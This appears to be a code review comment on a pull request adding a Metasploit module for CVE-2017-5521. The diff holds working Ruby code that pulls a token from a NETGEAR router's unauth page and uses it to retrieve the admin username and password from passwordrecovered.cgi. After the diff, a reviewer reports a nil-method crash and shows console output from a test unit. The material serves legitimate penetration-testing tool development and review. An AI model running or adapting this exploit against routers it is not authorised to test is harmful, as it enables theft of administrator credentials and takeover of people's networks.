modules/auxiliary/gather/netgear_password_disclosure.rb

```diff
@@ -0,0 +1,136 @@
+      'Name'           => 'NETGEAR Administrator Password Disclosure',
+      'Description'    => %q{
+        This module will collect the password for the `admin` user.
+        The exploit will not complete if password recovery is set on the router.
+        The password is recieved by passing the token generated from `unauth.cgi`
+        to `passwordrecovered.cgi`. This exploit works on many different NETGEAR
+        products. The full list of affected products is available in the 'References'
+        section.
+
+      },
+      'Author'         =>
+        [
+          'Simon Kenin', # Vuln Discovery, PoC
+          'thecarterb'   # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2017-5521' ],
+          [ 'URL', 'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2017-003/?fid=8911' ],
+          [ 'URL', 'http://thehackernews.com/2017/01/Netgear-router-password-hacking.html'],
+          [ 'URL', 'https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2017-5521--Bypassing-Authentication-on-NETGEAR-Routers/'],
+          [ 'URL', 'http://pastebin.com/dB4bTgxz'],
+          [ 'EDB', '41205']
+        ],
+      'License'        => MSF_LICENSE
+    ))
+
+    register_options(
+    [
+      OptString::new('TARGETURI', [true, 'The base path to the vulnerable application', '/'])
+    ], self.class)
+  end
+
+  # @return substring of 'text', usually a response from a server in this case
+  def scrape(text, start_trig, end_trig)
+    text[/#{start_trig}(.*?)#{end_trig}/m, 1]
+  end
+
+  def run
+    uri = target_uri.path
+    uri = normalize_uri(uri)
+    print_status("Checking if #{rhost} is a NETGEAR router")
+    vprint_status("Sending request to http://#{rhost}/")
+
+    # will always call check no matter what
+    is_ng = check
+
+    res = send_request_cgi({ 'uri' => uri })
+    if res.nil?
+      print_error("#{rhost} returned an empty response.")
+      return
+    end
+
+    if is_ng == Exploit::CheckCode::Detected
+      marker_one = "id="
+      marker_two = "\""
+      token = scrape(res.to_s, marker_one, marker_two)
+
+      if token.nil?
+        print_error("#{rhost} is not vulnerable: Token not found")
+        return
+      end
+
+      if token == '0'
+        print_status("If no creds are found, try the exploit again. #{rhost} returned a token of 0")
+      end
+      print_status("Token found: #{token}")
+      vprint_status("Token found at #{rhost}/unauth.cgi?id=#{token}")
+
+      r = send_request_cgi({
+        'uri' => "/passwordrecovered.cgi",
+        'vars_get' => { 'id'  =>  token }
+        })
+
+      vprint_status("Sending request to #{rhost}/passwordrecovered.cgi?id=#{token}")
+
+      html = r.get_html_document
+      raw_html = html.text
+
+      username = scrape(raw_html, "Router Admin Username", "Router Admin Password")
+      password = scrape(raw_html, "Router Admin Password", "You can")
+      username = username.strip!
```

Comment:
I'm pretty sure this is causing me to get a stack trace when I run this against my test unit which is not vulnerable.

```
msf (S:0 J:0) auxiliary(netgear_password_disclosure) > run

[*] [2017.02.07-20:39:29] Checking if 192.168.254.1 is a NETGEAR router
[*] [2017.02.07-20:39:29] Sending request to http://192.168.40.1/
[+] [2017.02.07-20:39:29] Router is a NETGEAR router (NETGEAR R7000)
[*] [2017.02.07-20:39:29] Token found: 547112587
[*] [2017.02.07-20:39:29] Token found at 192.168.40.1/unauth.cgi?id=547112587
[*] [2017.02.07-20:39:29] Sending request to 192.168.40.1/passwordrecovered.cgi?id=547112587
[-] [2017.02.07-20:39:29] Auxiliary failed: NoMethodError undefined method `strip!' for nil:NilClass
[-] [2017.02.07-20:39:29] Call stack:
[-] [2017.02.07-20:39:29]   /home/steiner/repos/msf/modules/auxiliary/gather/netgear_password_disclosure.rb:95:in `run'
```